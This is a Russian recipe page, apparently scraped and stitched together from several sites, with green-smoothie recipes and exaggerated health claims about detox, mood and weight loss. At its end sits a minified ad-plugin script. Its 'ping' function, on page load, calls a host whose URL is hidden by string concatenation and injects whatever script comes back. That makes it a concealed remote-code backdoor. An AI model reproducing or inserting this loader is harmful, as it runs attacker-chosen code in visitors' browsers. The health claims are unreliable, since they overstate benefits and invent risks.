Зеленый смузи рецепт

Зеленые смузи: 5 простых рецептов

Зеленые смузи — удивительно полезный продукт. Доказано, что коктейли из зеленых фруктов и овощей способны не только оказывать мощный детокс-эффект, но также улучшать обмен веществ, насыщать организм витаминами и минералами, обеспечивать его дополнительными силами и энергией. Проще говоря, если вы еще не пробовали зеленые смузи, то сделать это нужно прямо сейчас. А мы расскажем о пяти простых, но эффективных рецептах на все случаи жизни.

Для здоровой кожи: салат + петрушка

Основу смузи составляют листья салата, петрушка и огурец, которые почти не содержат калорий, а вместе с тем обеспечивают организм витаминами и питательными веществами, особенно полезными для кожи. Этот рецепт также следует взять на вооружение тем, кто придерживается диеты – пить коктейль можно не только за два часа до сна, но и непосредственно перед сном, если вам этого очень хочется.

Ингредиенты:

  • 2 пучка зеленого салата
  • 1 пучок петрушки
  • 1 огурец среднего размера
  • Перец по вкусу

Салат и петрушку тщательно вымойте и просушите на полотенце. Огурец нарежьте большими кубиками, предварительно очистив от кожуры. Поместите ингредиенты в чашу блендера и взбивайте до получения однородной массы. Уже в стакане «приправьте» смузи молотым черным, душистым или розовым перцем.

Для энергии: киви + шпинат

Смузи из шпината и киви способен придать заряд бодрости после бессонной ночи или заставить мозг работать, когда он отчаянно отказывается это делать. Кроме того, такой коктейль является одним из лучших вариантов перекуса перед силовой или кардиотренировкой: все дело в банане, который не только придает напитку мягкий вкус, но также содержит полезные углеводы и достаточное количество калия, чтобы избавить вас от усталости и болей в мышцах.

Ингредиенты:

  • 2 пучка шпината
  • 1 киви
  • 1 небольшой банан
  • 1/2 чашки кокосового молока

Шпинат вымойте и тщательно просушите. Киви и банан нарежьте небольшими дольками, предварительно очистив от кожуры. Сложите все ингредиенты в чашу для блендера, добавьте к ним кокосовое молоко — и взбейте до получения однородной массы.

Для хорошего настроения: яблоко + лайм

Если хмурая осень с каждым днем влияет на вас все больше и больше, в рамках противостояния этому пагубному влиянию стоит начать поднимать настроение любыми доступными средствами. Смузи с яблоком и лаймом — один из самых достойных и, что немаловажно, полезных вариантов. Сок лайма успокоит нервную систему и усилит выработку эндорфинов, а яблоко – природный антиоксидант — придаст бодрости, нормализует пищеварение и укрепит иммунитет.

Ингредиенты:

  • 1 зеленое яблоко
  • 1 лайм
  • 1/2 чашки воды
  • 1-2 листика мяты

Лайм очистите от кожуры и семечек, и порежьте на кубики. У яблока вырежьте сердцевину, и нарежьте фрукт небольшими дольками. Поместите ингредиенты в блендер, добавьте воду – и взбейте до получения однородной массы. Готовый смузи украсьте листиками мяты.

Для похудения: огурец + киви + ананас

Огурец содержит минимальное количество калорий и позволяет насытить организм влагой. Киви богат витаминами, магнием, кальцием, фосфором и железом. Ананас — важный источник витамина С и уникальный фрукт, «запускающий» метаболизм и притупляющий чувство голода. Стоит ли говорить, насколько полезен в смысле потери веса может быть этот смузи? Льняное масло, в свою очередь, добавит к «чудо-смеси» еще и омега-3 жирные кислоты.

Ингредиенты:

  • 1 небольшой огурец
  • 1 киви
  • 3-4 кольца ананаса
  • 1 столовая ложка льняного масла
  • 1 чайная ложка лимонного сока

Киви и огурец нарежьте кубиками, предварительно очистив от кожуры. Нарежьте ананас на небольшие дольки. Поместите ингредиенты, включая льняное масло, в чашу блендера и взбейте до получения однородной массы. Уже в стакане добавьте в смузи лимонный сок.

Для иммунитета: брокколи + апельсин

Вы наверняка знаете, что капуста брокколи содержит в 2,5 раза больше витамина С, чем цитрусовые. Таким образом, чтобы создать настоящую витаминную бомбу, которая поможет без труда пережить сезон простуд, достаточно добавить к овощу апельсин или лимон, а заодно полезные жиры, которые сделают состав смузи оптимальным и даже идеальным.

Ингредиенты:

  • 5-6 соцветий капусты брокколи
  • 1/2 апельсина
  • 1 кольцо ананаса
  • 1/2 чашки воды
  • 1 столовая ложка кокосового масла

Апельсин очистите от кожуры и косточек, а затем нарежьте на кусочки. Ананас и брокколи также нарежьте небольшими дольками. Поместите все ингредиенты в чашу блендера, добавьте кокосовое масло — и взбейте до получения однородной массы.

Что еще полезно знать о зеленых смузи

Как и другие детокс-коктейли, зеленые смузи необходимо употреблять сразу же после приготовления. Ни при каких условиях не добавляйте в зеленый смузи сахар или соль. В противном случае, напиток рискует стать в два (а то и три) раза менее полезным. Залог эффективности зеленых смузи — регулярность. Старайтесь пить коктейль каждый день в течение одной или двух недель.

Помните, что критический максимум в употреблении подобных напитков — 3 стакана в сутки. При превышении нормы количество витаминов и микроэлементов, содержащихся в зеленых смузи, может привести к гипервитаминозу и аллергическим реакциям.

В идеале вы должны заменять смузи один из приемов пищи, но если вы не ставите своей целью похудение, то это совсем не обязательно. Достаточно сделать перерыв между употреблением смузи и, например, обедом в течение 1-1,5 часов.

РЕЦЕПТЫ: 19 зелёных смузи — заряд бодрости для любящих себя!

Простые зелёные смузи, продукты к которым вы без труда найдёте практически в любом более-менее крупном супермаркете или на ближайшем рынке.

Для начала запомните простую формулу, используя которую вы сможете приготовить вкусный смузи из того, что в данный момент есть в холодильнике:

Жидкая основа (1/2–1 чашка) + 1 чашка зелени + 1 замороженный фрукт или 1 чашка ягод = СМУЗИ

Смузи № 1

Ингредиенты: 1 огурец, 1 стакан йогурта.

Приготовление. Смешать все ингредиенты в блендере.

Смузи № 2

Ингредиенты: 1 замороженный банан, 1 чашка шпината или зелёного салата, 1 чашка миндального молока.

Приготовление. Смешать все ингредиенты в блендере.

Смузи № 3

Ингредиенты: 1 огурец, 1 долька дыни, 1 груша, 1 стакан воды.

Приготовление. Смешать все ингредиенты в блендере.

Смузи № 4

Ингредиенты: 1 банан, 1 чашка шпината или зелёного салата, 1 чашка апельсинового сока.

Приготовление. Смешать все ингредиенты в блендере.

Dionisvera/Shutterstock

Смузи № 5

Ингредиенты: 1 чашка зелёного винограда, 1 чашка шпината или зелёного салата, 1 чашка апельсинового сока.

Приготовление. Смешать все ингредиенты в блендере.

Смузи № 6

Ингредиенты: 1 банан, 1 чашка зелёного винограда, 1 чашка йогурта.

Приготовление. Смешать все ингредиенты в блендере.

Смузи № 7

Ингредиенты: 1 чашка зелёного винограда, 1 банан, 1 чашка зелёного салата, 1 чашка апельсинового сока.

Приготовление. Смешать все ингредиенты в блендере.

Смузи № 8

Ингредиенты: 1 чашка шпината или зелёного салата, 1 персик, 1 чашка апельсинового сока.

Приготовление. Смешать все ингредиенты в блендере.

Смузи № 9

Ингредиенты: 1 яблоко, 1 чашка нарезанного стебля сельдерея, 1 чашка воды.

Приготовление. Смешать все ингредиенты в блендере.

Olha Afanasieva/Shutterstock

Смузи № 10

Ингредиенты: 1 чашка нарезанного стебля сельдерея, 1 банан, 1 морковь, 1 стакан йогурта.

Приготовление. Смешать все ингредиенты в блендере.

Смузи № 11

Ингредиенты: 1 банан, 1 чашка шпината или зелёного салата, 1/2 чашки нарезанного стебля сельдерея, 1 чашка воды.

Приготовление. Смешать все ингредиенты в блендере.

Смузи № 12

Ингредиенты: 1 банан, 1 чашка салата, 1 груша, 1 чашка миндального молока.

Приготовление. Смешать все ингредиенты в блендере.

Смузи № 13

Ингредиенты: 1 персик, 1 морковь, 1 чашка йогурта.

Приготовление. Смешать все ингредиенты в блендере.

Olha Vlasova/Shutterstock

Смузи № 14

Ингредиенты: 1 морковь, 1 яблоко, 1 огурец, 1 чашка миндального молока.

Приготовление. Смешать все ингредиенты в блендере.

Смузи № 15

Ингредиенты: 1 банан, 1 чашка шпината или зелёного салата, 1 чашка соевого молока.

Приготовление. Смешать все ингредиенты в блендере.

Смузи № 16

Ингредиенты: 1 морковь, 1 чашка зелёного салата, 1 чашка соевого молока.

Приготовление. Смешать все ингредиенты в блендере.

Смузи № 17

Ингредиенты: 1 чашка нарезанного стебля сельдерея, 1 чашка зелёного салата, 1 чашка яблочного сока.

Приготовление. Смешать все ингредиенты в блендере.

Смузи № 18

Ингредиенты: 1 яблоко, 1 банан, 1/2 чашки йогурта, 1/2 чашки яблочного сока.

Приготовление. Смешать все ингредиенты в блендере.

Смузи № 19

Ингредиенты: 1 груша, 1 банан, 1/2 чашки йогурта, 1/2 чашки яблочного сока.

Приготовление. Смешать все ингредиенты в блендере.

Во всех рецептах, если вам не хватает сладости, можете добавить по вкусу мёд или любой другой подсластитель. То же самое касается градации густоты смузи и степени измельчения фруктов: можно добавить чуть больше жидкости или же чуть меньше твёрдых ингредиентов.

Зеленые смузи

Подборка рецептов зеленых смузи для блендера с пошаговыми фото и инструкциями. Мы расскажем и покажем, как сделать зеленый смузи из зелени и фруктов в домашних условиях!

Похожие подборки рецептов

Упорядочить рецепты по .

Рецепты зеленых смузи (из зелени и фруктов)

Ингредиенты

Сельдерей – 1 стебель

Вода минеральная без газа – 2 ст.л.

Ингредиенты

Шпинат – 1 пучок

Замороженный банан – 1-2 шт. (по вкусу)

Мята – 2-3 веточки (по вкусу/по желанию)

Ингредиенты

Свежий огурец – 1 шт.

Зеленое яблоко – 1 шт.

Белый виноград – небольшая гроздь

Ингредиенты

Чеснок – 1 зубчик (по желанию)

Кефир – 300-400 мл

Укроп – 2-3 веточки

Петрушка – 2-3 веточки (по желанию)

Мята – 2-3 веточки (по желанию)

Молотый черный перец – по вкусу

Ингредиенты

Сельдерей (стебель) – 2 черешка

Лимонный сок – 1 ч.л.

Оливковое масло – 0,5 ч.л. (пара капель)

Петрушка – 2-3 веточки

Соль и перец – по вкусу

Минеральная вода без газа – 100 мл (по желанию)

Ингредиенты

Шпинат молодой – 1 пучок

Петрушка – 0,5 пучка

Яблоко зеленое – 1 шт.

Масло оливковое – 1 ст.л.

Соль морская – щепотка

Мед – по желанию

Вода минеральная – 1 стакан

Ингредиенты

Питьевая вода – 1 стакан

Семена льна – 1/2 ч.л.

Ингредиенты

Сельдерей стеблевой- 30 г

Салатные листья – 10 г

Мед – по желанию

Вода минеральная без газа – по желанию

Ингредиенты

Лимонный сок – 1 ст.л.

Питьевая вода – 100 мл

Ингредиенты

Яблоко (зеленое) – 1 шт.

Капуста пекинская – 100 г

Йогурт натуральный (жирность 1-3,2%) – 150 г

Мед – по желанию

Ингредиенты

Ананасы консервированные (кусочки) – 1 стакан

Сироп (из-под ананасов) – по вкусу

Мята (листочки) – 5 шт.

Ингредиенты

Банан – 1 шт. (130 г)

Персик – 1 шт. (230 г)

Ингредиенты

Сельдерей стеблевой – 2-3 стебля

Овсяные хлопья – 3 ст.л.

Льняная семечка – 1 ст.л.

Масло оливковое – 2-3 ст.л.

Вода питьевая – 300 г

Лимонный сок – 1 ст.л.

Соль морская – по вкусу

Ингредиенты

Сельдерей стеблевой – 2-3 стебля

Масло оливковое – 2-3 ст.л.

Соль морская – по вкусу

Вода питьевая – 250-300 г

Ингредиенты

Шпинат замороженный – 50 г

Вода питьевая – по вкусу

Лимонный сок – 1 ч.л.

Ингредиенты

Сельдерей – 50 г

Чай зелёный – 250 мл

Ингредиенты

Ананас (консервированный, кусочки) – 200 г

Мята (листья) – 10 шт.

Семена льна – 2 ст.л.

Хлопья овсяные – 25 г

Фисташки (очищенные, несоленые) – 40 г

Сок лайма – по вкусу

Вода питьевая – 200 мл

Ингредиенты

Питьевая вода – 300 мл

Мед – по желанию и вкусу

Ингредиенты

Дыня (мякоть) – 350-500 г

Шпинат – 1 большой пучок

Манго – 1 шт. (или ягоды/фрукты по вкусу)

Сок лимона – 0.5-1 ч.л. (по желанию)

Соль – маленькая щепотка (по желанию)

“Фруктовый” смузи из дыни:

Дыня (мякоть) – 350-500 г

Виноград – 1-2 грозди (200-300 г)

Замороженные ягоды/ фрукты – горсть (по вкусу)

Сок лимона – по вкусу/ по желанию

Мед – по вкусу/ по желанию

Ингредиенты

Лимонный сок – 0,5 ч.л.

Растительное масло – 1 ст.л.

Петрушка – 3 веточки

Ингредиенты

Петрушка – 100 г

Чай зелёный – 100 мл

Ингредиенты

Вода питьевая (охлажденная) – 250 мл

Мука кедровая – 70 г

Шпинат (замороженный) – 2 горсти

Паста арахисовая – 1 ст.л. с горкой

Сироп – по желанию

Орехи кедровые – для украшения

Мята – для украшения

Ингредиенты

Вода – 1,5 стакана

Капуста кейл (листья) – 5 шт.

Сельдерей (стебли) – 2 шт.

Шпинат (свежий) – 20 г

Яблоко (зеленое) – 1 шт.

Ингредиенты

Свежий огурец – 1 шт.

Укроп, петрушка – 1-2 шт.

Оливковое масло – 1 ч.л.

Лимонный сок – по вкусу

Ингредиенты

Сельдерей – 2-3 палочки

Салатные листья – 20 г

Семена льна – 1 ч.л.

Поделитесь подборкой рецептов с друзьями

АЙМКУК © 2007-2020 год. Все права защищены.
Использование материалов сайта без письменного разрешения, запрещено законом об Авторских правах Гражданского Кодекса Российской Федерации от 18 декабря 2006 года N 230-ФЗ

Зеленые смузи — полезные свойства и рецепты приготовления

Последнее время я подсела на зеленые смузи, удивительно полезный, вкусный и очень насыщенной напиток.

Решила немножко собрать полезной информации про него и поделиться с вами.

Читайте, это интересно!

Из этой статьи вы узнаете:

Зеленые смузи — полезные свойства и рецепты приготовления

О том, что зеленые овощи невероятно полезны для здоровья, знают абсолютно все. Они тонизируют, насыщают организм полезными веществами.

Однако вкусовые качества у этих продуктов, на любителя.

Куда лучше и вкуснее будет выпить напиток, приготовленный из зеленых овощей — зеленый смузи.

Что может входить в состав зеленых смузи?

В коктейль входят свежевыжатые овощные соки с мякотью.

Иногда, если нужно, добавляются различные жидкости.

Для придания консистенции густоты, его не разводят с жидкостями и не пьют, а едят, как готовое блюдо.

Чтобы у вас получился именно такой шейк, необходимо использовать качественный кухонный блендер.

О полезных свойствах напитка — чем полезен зеленый смузи

Коктейли из зеленых овощей невероятно полезны.

Давайте уясним, по каким причинам людям, бережно заботящимся о своем здоровье, пришелся по вкусу этот напиток?

Это объясняется тем, что при его употреблении в организме происходит множество полезных перемен, а именно:

  • восстанавливается энергия и увеличивается работоспособность;
  • укрепляются защитные силы;
  • уменьшается масса тела;
  • происходит общее очищение всего организма;
  • настроение становится значительно лучше, проходят депрессии;
  • увеличивается стрессоустойчивость;
  • восстанавливаются процессы пищеварения;
  • обеспечивается противовоспалительное и антиоксидантное воздействие.

Те, кто однажды попробовал в своей жизни подобный напиток, готовят его регулярно и наслаждаются его вкусом и пользой.

Как правильно пить зеленые коктейли- смузи?

В идеале употреблять смузи необходимо по утрам после пробуждения.

Вы можете также приготовить сей напиток себе с вечера, плотно закрыть и поместить в холодильник.

После пробуждения вам придется энергично встряхнуть приготовленный шейк, и после этого полезный и вкусный завтрак вам обеспечен.

Отлично применять коктейль и вместо перекусов в перерывах между приемами пищи.

Чтобы получить максимальную пользу от продукта, соблюдайте отдельные рекомендации:

  • вкусовые качества должны быть максимально приятными, но не стоит добавлять сахар либо соль для этого;
  • в течении первых тридцати дней разрешается пить только по одному шейку в день;
  • употреблять жидкость рекомендуется маленькими глотками, используя для этой цели соломинку или кушать ложечкой;
  • данный продукт принимается независимо от всех остальных продуктов питания;
  • промежуток перед приемом пищи после шейка должен составлять примерно час;
  • не стоит пить коктейль при наличии патологий поджелудочной железы, почек и желчного пузыря.

Помните, что не нужно выпивать данный напиток в больших количествах.

Здесь главное – мера. Огромное количество сырых овощей приводит к расстройству пищеварения и чрезмерному вздутию.

Зеленые смузи – Рецепты приготовления

  • Зеленый смузи для похудения из зеленого яблока и лайма

Лайм славится своей способностью прекрасно успокаивать нервную систему, очищать организм и тонизировать.

Для приготовления шейка необходимо помыть лайм и прочистить от кожицы и всего лишнего, точно также поступаем с яблоком и разрезаем его по небольшим дольками.

Все ингредиенты необходимо перемешать с помощью кухонной техники и употребить.

  • Коктейль с зеленым чаем и киви

Для приготовления этого напитка вам необходимо иметь одно киви, яблоко, пчелиный мед и сам зеленый чай. Сначала завариваем чай по своему желанию, но в идеале он должен быть крепкий.

Фрукты моем и очищаем, делаем из них пюреобразную массу, добавляем мед.

После этого наливаем чай, еще раз все тщательно перемешиваем и пьем.

  • Шейк из зеленой гречки

Замачиваем гречневую крупу очищенной водой, через полдня тщательно промываем и оставляем прорастать. Уже через 24 часа будут видны первые ростки.

Для приготовления самого шейка можно взять любые фрукты, например, огурец, авокадо, банан и мяту. Энергично все перемешиваем и можем наслаждаться прекрасным вкусом.

Этот шейк считается наиболее низкокалорийным.

Он эффективен тем, что успешно выводит токсины и шлаки из организма, успокаивает и тонизирует.

Тщательно промойте и высушите стебель растения и приготовьте одно яблоко в прочищенном виде.

Все перебейте в однородную массу и употребляйте с удовольствием.

Это наиболее полезный овощ, который очень ценится людьми, пропагандирующими вегетарианство.

Для приготовления полезного смузи возьмите около двухсот грамм данного овоща, тщательно его вымойте и нарежьте.

Очистите лайм от кожуры и всего лишнего.

Все ингредиенты нужно тщательно перебить в блендере. Напиток готов к употреблению.

  • Рецепт смузи с кефиром

Для приготовления напитка вам требуется около 400 мл кисломолочного продукта нежирного, а также любые зеленые овощи по желанию.

Количество овощей может быть 1 или несколько.

Взбивайте ингредиенты около 15 минут и после этого добавьте в эту смесь мед и орехи. Напиток готов.

  • Насыщенный зеленый смузи шейк с базиликом

Для приготовления возьмите листья шпината, авокадо, грушу, яблоко, сельдерей, базилик, лайм и дыню.

Смотрите чтобы ингредиентов было примерно одинаково.

Сначала достаньте из лайма сок, очищенное авокадо залейте им, нарежьте мелко прочищенную зеленую грушу и авокадо. Выжимаем сок из яблока, груши и сельдерея.

Порежьте дыню на кубики, поместите все в блендер на пять минут и добейтесь однородной консистенции.

Как приготовить зеленый смузи – полезное видео

Многие думают, что напитки из зеленых ингредиентов будут не очень на вкус, но если вы не любите подобные шейки, тогда добавьте немного сладких фруктов или меда и коктейль тут же заиграет новыми вкусовыми нотками.

Также можно добавлять творог, йогурт, орехи, в общем, все, что кажется вам гармоничным с конкретными продуктами.

Очень интересными и вкусными получаются напитки, приготовленные на основе минералки, соков и чаев.

А такие пряности, как корица, бергамонт, имбирь и мята будто созданы для того, чтобы завершить ансамбль потрясающего коктейля.

Также вам могу быть интересны эти рецепты смузи:

А какие рецепты зеленых смузи знаете вы?

С вами была Алена Яснева, всем пока!

ПРИСОЕДИНЯЙТЕСЬ К МОИМ ГРУППАМ В СОЦИАЛЬНЫХ СЕТЯХ

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};